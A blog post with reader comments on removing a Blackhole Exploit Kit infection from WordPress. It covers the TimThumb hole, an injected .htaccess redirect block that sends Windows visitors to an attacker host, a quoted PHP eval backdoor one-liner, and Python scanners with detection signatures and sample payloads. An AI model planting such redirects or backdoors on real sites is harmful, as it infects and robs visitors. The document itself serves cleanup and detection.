We didn’t pay attention to the Blackhole Exploit Kit problem with WordPress until it happened to our client. You can imagine my shock when I went to create a blog post on CPG only to get a notification from AVG Link Scanner that a threat from Computer Parts Greenville had been blocked. This had to be a mistake. The AVG message said:
Exploit Blackhole Exploit Kit (Type 2115)
Clicking “Show Details” and “More Information” produced nothing useful, so I asked our webmistress to look into the problem.

The Blackhole Exploit Kit temporarily infected Computer Parts Greenville. Here's how to solve the problem on WordPress blogs.
For days I had our webmistress scanning our domain and reading up on the Blackhole Exploit Kit. Guess what kind of information she found on Google? The same kind I found: zilch.
Dissing Search Engines
I must take a moment to diss the search engines. As time goes on, I find less and less useful information on Google and Bing. The Farmer/Panda updates were supposed to make sure we all got search results that were relevant and valuable; on this topic, Google and Bing failed. Still, I had to let our webmistress go. I sympathize with her inability to find worthwhile information about the Blackhole Exploit Kit, but she should have had the expertise to solve this kind of problem. That’s why we paid her the big bucks.
Symptoms of Blackhole
The following observations helped us understand Blackhole:
The Type 2115 Doesn’t Mean Much
AVG tags its Blackhole detections with a type number, and different infections show up with different numbers. The number is part of AVG's detection name, not a property of the infection on your site; don’t get hung up on it.
Banned from Bing
After the AVG message appeared while I was loading the Computer Parts website, the next symptom was an email from Bing telling us that computerpartsgreenvillesc.com hosted malware. I got angry. There was no way we hosted malware; it had to come from the advertising network. We got rid of the ad network, and I still received AVG warnings. Meanwhile, Google continued to report the Computer Parts website as malware free.
Intermittent
The Blackhole redirect does not fire on every visit. The injected rewrite rules (shown later in this article) only redirect a visitor who arrives from a search engine or social site, runs Windows, does not look like a crawler, and has not been redirected before; the redirect also sets a cookie so the same browser is not sent to the exploit kit twice. That is what makes it hard to detect: the site owner, repeat visitors and most scanners see a clean site (comforting, is it not?).
Frustrating
What frustrated us most about Blackhole was our inability to find a meaningful solution. We found descriptions of the problem and fake solutions, but no real ones. Our webmistress finally answered my questions before I gave her the ax.
Fixing Blackhole Exploit Kit infections in WordPress
This article is about Blackhole on WordPress only; I don’t give a flyin’ flip about other platforms, OK? That said, the information may help anyone who deals with the Blackhole problem.
Timthumb.php or Thumb.php
In our case the attackers got in through timthumb.php or thumb.php, the script many WordPress themes use to resize images on the fly (your theme has one, the other, or neither). Vulnerable versions of TimThumb would fetch a file from a remote host whose name merely resembled one of the allowed image sites and save whatever came back, PHP included, as an executable file in the theme's cache directory, giving the attacker code execution on the server. Note that Blackhole itself is not a WordPress exploit: it is a browser exploit kit hosted on the attackers' own servers. The compromised site only redirects visitors to it, so its own pages contain no malware, which explains why you can scan every page on an infected site all day and find nothing.
Fixing Timthumb.php or Thumb.php
WordPress webmasters will usually find thumb.php or timthumb.php in the main folder of a theme, but some themes keep it in a subfolder (lib, scripts and the like), so search the whole wp-content tree rather than just the theme root. Some themes do not use TimThumb at all.
First, download the latest timthumb.php from the project. Next, change the following two settings in it:

define( 'ALLOW_EXTERNAL', false );

and

$allowedSites = array();

Finally, upload the edited file over every copy of timthumb.php or thumb.php in every theme that uses it, keeping the filename the theme expects. With ALLOW_EXTERNAL set to false and the allowed-sites list empty, the script will only resize images that already live on your own server, which is all most themes ever need.
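A scripted audit of the steps above, added here as an example and not code from the original post or from the TimThumb project: it finds every timthumb.php and thumb.php under wp-content, reads the VERSION, ALLOW_EXTERNAL and $allowedSites settings out of each copy, reports the ones that still allow remote fetching, and flags PHP code sitting in a theme's cache directory, which is where the 2011 TimThumb exploit stored what it uploaded. The theme files it runs on are constructed stubs containing only those setting lines; the function names and the 2.0 version threshold are my choices.

```python
import os
import re
import tempfile

VERSION_RE = re.compile(r"define\s*\(\s*['\"]VERSION['\"]\s*,\s*['\"]([^'\"]+)['\"]", re.I)
EXTERNAL_RE = re.compile(r"define\s*\(\s*['\"]ALLOW_EXTERNAL['\"]\s*,\s*(true|false)\s*\)", re.I)
SITES_RE = re.compile(r"\$allowedSites\s*=\s*array\s*\((.*?)\)\s*;", re.I | re.S)
SAFE_VERSION = (2, 0)  # assumption: the August 2011 2.0 rewrite is the first acceptable line


def parse_timthumb(source):
    """Pull the three settings that matter out of one timthumb.php source."""
    v, e, s = VERSION_RE.search(source), EXTERNAL_RE.search(source), SITES_RE.search(source)
    return {
        "version": v.group(1) if v else None,
        "allow_external": (e.group(1).lower() == "true") if e else None,
        "allowed_sites": re.findall(r"['\"]([^'\"]+)['\"]", s.group(1)) if s else None,
    }


def version_tuple(version):
    return tuple(int(x) for x in re.findall(r"\d+", version)) if version else (0,)


def audit_timthumb(source):
    """List what is wrong with one copy; an empty list means it matches the fix above."""
    info = parse_timthumb(source)
    problems = []
    if version_tuple(info["version"]) < SAFE_VERSION:
        problems.append(f"version {info['version'] or 'unknown'} predates the 2.0 rewrite: replace the file")
    if info["allow_external"] is not False:
        problems.append("ALLOW_EXTERNAL is not false: remote image fetching is still enabled")
    if info["allowed_sites"]:
        problems.append("allowedSites is not empty: " + ", ".join(info["allowed_sites"]))
    return problems


def audit_tree(root):
    """Audit every timthumb.php/thumb.php under root and flag PHP inside any cache directory."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if name.lower() in ("timthumb.php", "thumb.php"):
                with open(path, encoding="utf-8", errors="replace") as fh:
                    problems = audit_timthumb(fh.read())
                if problems:
                    report[rel] = problems
            elif os.path.basename(dirpath).lower() == "cache":
                # the 2011 exploit parked its payload as a .php file in TimThumb's
                # cache directory; a legitimate image cache never contains PHP
                with open(path, "rb") as fh:
                    if b"<?php" in fh.read():
                        report[rel] = ["PHP code inside a cache directory: attacker-written file"]
    return report


def build_sample_site(root):
    """Constructed stubs holding only the setting lines (not real TimThumb sources)."""
    samples = {
        "themes/old-theme/thumb.php":
            "<?php\ndefine ('VERSION', '1.33');\n$allowedSites = array('flickr.com', 'picasa.com');\n",
        "themes/new-theme/timthumb.php":
            "<?php\ndefine ('VERSION', '2.8.11');\ndefine ('ALLOW_EXTERNAL', TRUE);\n"
            "$allowedSites = array ('flickr.com', 'img.youtube.com');\n",
        "themes/fixed-theme/lib/timthumb.php":
            "<?php\ndefine ('VERSION', '2.8.11');\ndefine( 'ALLOW_EXTERNAL', false );\n"
            "$allowedSites = array();\n",
        "themes/new-theme/cache/external_0a1b2c.php": "GIF89a<?php eval($_POST['x']); ?>",
        "themes/new-theme/cache/3f4e5d.jpg": "JFIF placeholder, no code",
    }
    for rel, content in samples.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def run_demo():
    """Build the constructed wp-content tree in a temp dir and audit it."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return audit_tree(root)


if __name__ == "__main__":
    for rel, problems in sorted(run_demo().items()):
        print(rel)
        for p in problems:
            print("   -", p)
```

Point audit_tree at your real wp-content directory instead of the temp tree; any copy it lists needs the edit described above, and anything it reports under a cache directory should be deleted, not edited.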
An Easier Way
As an alternative, install the Timthumb Vulnerability Scanner plugin (upload it to the plugins directory or install it from the admin panel), then open the Tools tab in the WordPress admin panel and click Scan.
The scanner lists every vulnerable copy of thumb.php and timthumb.php it finds and offers to update them to the fixed version; copies it cannot update, or that the theme does not actually need, you delete by hand. Website owners can also hire Code Garage (the developer of the scanner) to do the clean-up, but most people can do this themselves. Computer Parts Greenville can help you do this too.
That’s Not All Folks! Check .htaccess!
If you fixed the timthumb problem, you might think recovery is complete. Wrong! Open your .htaccess file. It may look blank: the injected code is hidden behind a long run of empty lines (in our case about 778 of them) so that an editor window shows nothing. Until you remove it, Apache will keep redirecting visiting browsers to the exploit kit. A quick check is the line count: a WordPress .htaccess is normally under a dozen lines, so a file with hundreds or thousands of lines has been tampered with. The original content survives further down (for us at about line 1592). Here is what the malicious code looked like; different Blackhole infections vary slightly in the details. Read the conditions and the intermittent behaviour makes sense: the redirect fires only for GET requests arriving from a search engine or social site, from a Windows browser that matches none of the long list of crawler and non-Windows user agents, for non-image URLs, over plain HTTP, and only while the dHK cookie is absent; the RewriteRule then sets that cookie (CO=dHK:...) so the same browser is never redirected again. The trailing hex comment is part of the injection and goes too.
RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(wordpress|twit|tweet|flickr\.|linkedin|google\.|yahoo\.|bing\.|msn\.|ask\.|excite\.|altavista\.|netscape\.|aol\.|hotbot\.|goto\.|infoseek\.|mamma\.|alltheweb\.|lycos\.|metacrawler\.|mail\.|dogpile\?).*$ [NC]
RewriteCond %{HTTP_REFERER} !^.*(imgres\?q).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bing|Accoona|Ace\sExplorer|Amfibi|Amiga\sOS|apache|appie|AppleSyndication).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Archive|Argus|Ask\sJeeves|asterias|Atrenko\sNews|BeOS|BigBlogZoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Biz360|Blaiz|Bloglines|BlogPulse|BlogSearch|BlogsLive|BlogsSay|blogWatcher).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Bookmark|bot|CE\-Preload|CFNetwork|cococ|Combine|Crawl|curl|Danger\shiptop).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Diagnostics|DTAAgent|EmeraldShield|endo|Evaal|Everest\-Vulcan).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(exactseek|Feed|Fetch|findlinks|FreeBSD|Friendster|Fuck\sYou|Google).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Gregarius|HatenaScreenshot|heritrix|HolyCowDude|Honda\-Search|HP\-UX).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(HTML2JPG|HttpClient|httpunit|ichiro|iGetter|iPhone|IRIX|Jakarta|JetBrains).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Krugle|Labrador|larbin|LeechGet|libwww|Liferea|LinkChecker).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(LinknSurf|Linux|LiveJournal|Lonopono|Lotus\-Notes|Lycos|Lynx|Mac\_PowerPC).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Mac\_PPC|Mac\s10|Mac\sOS|macDN|Macintosh|Mediapartners|Megite|MetaProducts).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Miva|Mobile|NetBSD|NetNewsWire|NetResearchServer|NewsAlloy|NewsFire).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(NewsGatorOnline|NewsMacPro|Nokia|NuSearch|Nutch|ObjectSearch|Octora).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(OmniExplorer|Omnipelagos|Onet|OpenBSD|OpenIntelligenceData|oreilly).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(os\=Mac|P900i|panscient|perl|PlayStation|POE\-Component|PrivacyFinder).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(psycheclone|Python|retriever|Rojo|RSS|SBIder|Scooter|Seeker|Series\s60).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(SharpReader|SiteBar|Slurp|Snoopy|Soap\sClient|Socialmarks|Sphere\sScout).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(spider|sproose|Rambler|Straw|subscriber|SunOS|Surfer|Syndic8).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Syntryx|TargetYourNews|Technorati|Thunderbird|Twiceler|urllib|Validator).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Vienna|voyager|W3C|Wavefire|webcollage|Webmaster|WebPatrol|wget|Win\s9x).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Win16|Win95|Win98|Windows\s95|Windows\s98|Windows\sCE|Windows\sNT\s4).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(WinHTTP|WinNT4|WordPress|WWWeasel|wwwster|yacy|Yahoo).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(Yandex|Yeti|YouReadMe|Zhuaxia|ZyBorg).*$ [NC]
RewriteCond %{REQUEST_FILENAME} !.*jpg$|.*gif$|.*png|.*jpeg|.*mpg|.*avi|.*zip|.*gz|.*tar|.*ico$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*dHK.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://%{REMOTE_PORT}.akitahusky.org/url?sa=D&source=web&cd=40&ved=0GuhP3Pg6&url=http://%{HTTP_HOST}%{REQUEST_URI}&ei=2ZMsfq3I6K+wrI2Oz1A3+py1oQ==&usg=akutnxYqq9yva75j7XV0f8&sig2=6IwYwr5uIjrVSOmJayjLjr [R=302,L,CO=dHK:68:%{HTTP_HOST}:9540:/:0:HttpOnly]
#1c19e3ee4b8f15f4c02fe6977b77eb2ef831841123ecc963f40dd06b
After you delete the blank lines and the malicious code, nothing should be left but your original .htaccess file, which looks something like this:
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
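A scripted version of the .htaccess check above, added here as an example rather than code from the original post: it flags any RewriteCond/RewriteRule group that redirects off-site, sets a cookie with the CO= flag, or gates on cookie and User-Agent the way the injected block does, reports the longest run of blank lines (the padding trick), and produces a cleaned copy with the flagged groups and padding removed. The .htaccess it runs on is constructed for the example, with the redirector host replaced by a placeholder; the function names are mine.

```python
import re
import sys

RULE_RE = re.compile(r"^\s*RewriteRule\s+(\S+)\s+(\S+)(?:\s+\[([^\]]*)\])?", re.I)
COND_RE = re.compile(r"^\s*RewriteCond\s+(\S+)\s+(\S+)", re.I)

# Constructed sample, not a copy of a real file: a stock WordPress .htaccess,
# forty blank lines of padding, then an injected group shaped like the one
# quoted above, with the redirector host replaced by a placeholder.
CLEAN_WORDPRESS = """\
# BEGIN WordPress
RewriteEngine On
RewriteBase /
RewriteRule ^index\\.php$ - [L]
RewriteCond %{REQUEST_FILENAME} !-f
RewriteCond %{REQUEST_FILENAME} !-d
RewriteRule . /index.php [L]
# END WordPress
"""
INJECTED = r"""RewriteEngine On
RewriteCond %{REQUEST_METHOD} ^GET$
RewriteCond %{HTTP_REFERER} ^(http\:\/\/)?([^\/\?]*\.)?(google\.|bing\.|yahoo\.).*$ [NC]
RewriteCond %{HTTP_USER_AGENT} !^.*(bot|curl|wget|Linux|Macintosh).*$ [NC]
RewriteCond %{HTTP_COOKIE} !^.*dHK.*$ [NC]
RewriteCond %{HTTP_USER_AGENT} .*Windows.* [NC]
RewriteCond %{HTTPS} ^off$
RewriteRule ^(.*)$ http://%{REMOTE_PORT}.redirector.example/url?u=%{HTTP_HOST}%{REQUEST_URI} [R=302,L,CO=dHK:68:%{HTTP_HOST}:9540:/:0:HttpOnly] #1c19e3ee
"""
SAMPLE_HTACCESS = CLEAN_WORDPRESS + "\n" * 40 + INJECTED


def _reasons(cond_lines, rule_line, own_hosts):
    """Why one RewriteCond...RewriteRule group looks like the injected redirect."""
    m = RULE_RE.match(rule_line)
    target, flags = m.group(2), (m.group(3) or "")
    reasons = []
    host = re.match(r"https?://([^/?#]+)", target, re.I)
    if host and ("%{" in host.group(1) or host.group(1).lower() not in own_hosts):
        reasons.append("redirects off-site to " + target.split("?", 1)[0])
    if any(f.split("=", 1)[0].upper() == "CO" for f in flags.split(",")):
        reasons.append("sets a cookie with CO= so each browser is redirected only once")
    cond_vars = {COND_RE.match(c).group(1).upper() for c in cond_lines}
    if {"%{HTTP_COOKIE}", "%{HTTP_USER_AGENT}"} <= cond_vars:
        reasons.append("gates on cookie and User-Agent: crawlers and repeat visitors never see it")
    return reasons


def analyze_htaccess(text, own_hosts=()):
    """Return (findings, longest_blank_run); a finding is
    (line_no_of_rule, reasons, line_nos_of_the_whole_group)."""
    own = {h.lower() for h in own_hosts}
    lines = text.splitlines()
    findings, conds, run, longest = [], [], 0, 0
    for no, line in enumerate(lines, 1):
        if not line.strip():
            run += 1
            longest = max(longest, run)
            continue
        run = 0
        if COND_RE.match(line):
            conds.append(no)  # RewriteCond lines bind to the next RewriteRule
        elif RULE_RE.match(line):
            reasons = _reasons([lines[n - 1] for n in conds], line, own)
            if reasons:
                findings.append((no, reasons, conds + [no]))
            conds = []
    return findings, longest


def clean_htaccess(text, own_hosts=()):
    """Drop every flagged group, the blank-line padding and duplicate RewriteEngine lines."""
    findings, _ = analyze_htaccess(text, own_hosts)
    drop = {n for _, _, group in findings for n in group}
    out, seen_engine = [], False
    for no, line in enumerate(text.splitlines(), 1):
        if no in drop:
            continue
        if re.match(r"\s*RewriteEngine\b", line, re.I):
            if seen_engine:
                continue
            seen_engine = True
        if not line.strip() and (not out or not out[-1].strip()):
            continue  # collapse the padding to a single blank line
        out.append(line)
    while out and not out[-1].strip():
        out.pop()
    return "\n".join(out) + "\n"


if __name__ == "__main__":
    # usage: python htaccess_check.py [path/to/.htaccess] [your.host ...]
    text = open(sys.argv[1]).read() if len(sys.argv) > 1 else SAMPLE_HTACCESS
    findings, padding = analyze_htaccess(text, sys.argv[2:])
    print(f"longest run of blank lines: {padding}")
    for no, reasons, group in findings:
        print(f"line {no} (group {group[0]}-{group[-1]}): " + "; ".join(reasons))
    if findings:
        sys.stdout.write("--- cleaned ---\n" + clean_htaccess(text, sys.argv[2:]))
```

Pass your own hostnames as extra arguments so a legitimate redirect to your own domain (a www canonicalization, say) is not flagged; with none given, every absolute redirect is reported, which is the safer default during a clean-up. Review the findings before writing the cleaned output back over the live file.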
You have now finished recovering a WordPress-based website from the Blackhole Exploit Kit. Before going live again, make sure the wp-content folder (and every other directory under the web root) has permissions of 755 and that files are 644; a world-writable (777) directory anywhere under the web root is an open door for the next attacker. Also, if you use a WordPress caching plugin, clear its cache so that no cached copy of the corrupted pages is still served.
You should also change the passwords for your MySQL database, all your WordPress users and your site's FTP users, and rotate the authentication keys and salts in wp-config.php so that any login cookies captured during the infection stop working.
Other Issues
Blackhole Exploit Kits have become a very serious problem in the WordPress community. Read Alexis Blackshear’s report on Blackhole Exploit Kit faking Google Analytics and see how she suggests webmasters save time in recovery. Also, check out these other Computer Parts Greenville articles on the topic:
Our client’s website also had the Blackhole Exploit Kit, which would attempt to run a Java plugin on random visits to the site. They don’t have thumb.php or timthumb.php, and it’s not running Apache, so there’s no .htaccess file.
I found obfuscated php eval code at the beginning of index.php. I also found a new file in the wp root directory named ccjiqf.php which also had obfuscated php eval code.
I’m not sure what the entry point was. I suspect it might have been the wp-phpmyadmin plugin, which is reported to have vulnerabilities.
My solution was to recreate the index.php file, remove ccjiqf.php, chown root:root index.php, remove wp-phpmyadmin, and change the FTP/user and MySQL passwords.
Jason, Thanks for the great info about your Blackhole experience!
Also found this code in wp-includes/googlee8fe0e085b0387489db4a37d81369a46.php
[code]@eval(stripslashes($_REQUEST[asc]));[/code]
That was there for a while before the blackhole exploit. I’m not sure what it’s from. Any ideas?
Also, all of the theme index.php files had the obfuscated php eval code as well.
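A scanner for the two kinds of thing reported in the comments above, added here as an example rather than code from the post or from the commenters: eval() of request data (the @eval(stripslashes($_REQUEST[asc])) one-liner) and eval() of a decoded blob at the top of index.php, plus PHP files in the WordPress root that the release did not ship (the ccjiqf.php case). The sample site it scans is constructed for the demo: the file names echo the comments but their contents are placeholders, the list of known root files is my own for the WordPress 3.x layout, and the function names are mine.

```python
import os
import re
import tempfile

# What the comments above found, plus one classic relative (preg_replace with /e).
SIGNATURES = [
    (re.compile(r"eval\s*\(\s*(?:stripslashes\s*\()?\s*\$_(?:REQUEST|GET|POST|COOKIE)\s*\[", re.I),
     "eval() of request data: a remote command backdoor"),
    (re.compile(r"eval\s*\(\s*(?:base64_decode|gzinflate|gzuncompress|str_rot13|strrev)\s*\(", re.I),
     "eval() of a decoded payload: obfuscated injected code"),
    (re.compile(r"preg_replace\s*\(\s*['\"][^'\"]*/[a-z]*e[a-z]*['\"]", re.I),
     "preg_replace() with the /e modifier: code execution through a regex"),
]
LONG_BASE64 = re.compile(r"[A-Za-z0-9+/]{200,}={0,2}")

# Constructed for this example from the WordPress 3.x release layout; compare
# against the file list of the version you actually run.
KNOWN_ROOT_FILES = {
    "index.php", "wp-activate.php", "wp-app.php", "wp-blog-header.php", "wp-comments-post.php",
    "wp-config.php", "wp-config-sample.php", "wp-cron.php", "wp-links-opml.php", "wp-load.php",
    "wp-login.php", "wp-mail.php", "wp-pass.php", "wp-register.php", "wp-settings.php",
    "wp-signup.php", "wp-trackback.php", "xmlrpc.php",
}


def scan_source(source):
    """Return [(line_no, reason), ...] for one PHP source; empty means nothing matched."""
    hits = []
    for rx, why in SIGNATURES:
        m = rx.search(source)
        if m:
            hits.append((source.count("\n", 0, m.start()) + 1, why))
    m = LONG_BASE64.search(source)
    if m and "base64_decode" in source.lower():
        hits.append((source.count("\n", 0, m.start()) + 1, "long base64 literal next to base64_decode()"))
    return hits


def scan_tree(root):
    """Scan every .php file under root; also list root-level PHP files the release did not ship."""
    flagged, unexpected = {}, []
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if not name.lower().endswith(".php"):
                continue
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root).replace(os.sep, "/")
            if dirpath == root and name not in KNOWN_ROOT_FILES:
                unexpected.append(rel)
            with open(path, encoding="utf-8", errors="replace") as fh:
                hits = scan_source(fh.read())
            if hits:
                flagged[rel] = hits
    return flagged, sorted(unexpected)


def build_sample_site(root):
    """Constructed files echoing the comments above; contents are placeholders, not real captures."""
    blob = "ZWNobyAiaGVsbG8iOw=="  # base64 of: echo "hello"; -- the eval wrapper, not the blob, is the tell
    files = {
        "index.php": '<?php /**/eval(base64_decode("' + blob + '")); ?><?php\n'
                     "/** Front to the WordPress application */\nrequire('./wp-blog-header.php');\n",
        "ccjiqf.php": "<?php\n@eval(stripslashes($_REQUEST[asc]));\n",
        "wp-includes/googlee8fe0e085b0387489db4a37d81369a46.php":
            "<?php\n@eval(stripslashes($_REQUEST[asc]));\n",
        "wp-content/themes/sample/index.php":
            "<?php eval(gzinflate(base64_decode('" + blob + "'))); ?>\n<?php get_header(); ?>\n",
        "wp-load.php": "<?php\n/** Bootstrap */\ndefine('ABSPATH', dirname(__FILE__) . '/');\n"
                       "require_once(ABSPATH . 'wp-settings.php');\n",
        "wp-includes/formatting.php": "<?php\nfunction fix($s) { return preg_replace('/x/i', 'y', $s); }\n",
    }
    for rel, content in files.items():
        path = os.path.join(root, *rel.split("/"))
        os.makedirs(os.path.dirname(path), exist_ok=True)
        with open(path, "w") as fh:
            fh.write(content)


def run_demo():
    """Build the constructed site in a temp dir, scan it, return (flagged, unexpected)."""
    with tempfile.TemporaryDirectory() as root:
        build_sample_site(root)
        return scan_tree(root)


if __name__ == "__main__":
    flagged, unexpected = run_demo()
    for rel, hits in sorted(flagged.items()):
        for line, why in hits:
            print(f"{rel}:{line}: {why}")
    for rel in unexpected:
        print(f"{rel}: not part of the WordPress release")
```

Run scan_tree against the real document root and treat every hit as something to restore from a clean copy of WordPress or the theme rather than to patch in place; a file that WordPress did not ship and that nobody can account for is removed, as the commenter did with ccjiqf.php.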
Had this issue as well. Oddly, it did not manifest in the same way as you described, making me think that I had another version of the exploit. The main remedy was to fix the .htaccess file, and I’m waiting to see if the symptom returns. I did not have the same .htaccess problems as you.
Thanks for posting info about this!
Guys, I have just realized that my website is also infected by it.
I’m not a tech guy; how could Computer Parts Greenville help me solve this?
heeellllpppp!!!!
Hi there
Thank you for this info. It appears updating and changing the timthumb files has fixed it for me. Thank you!!!
Laura
Or not… It’s back
Could it be possible that my actual computer is infected?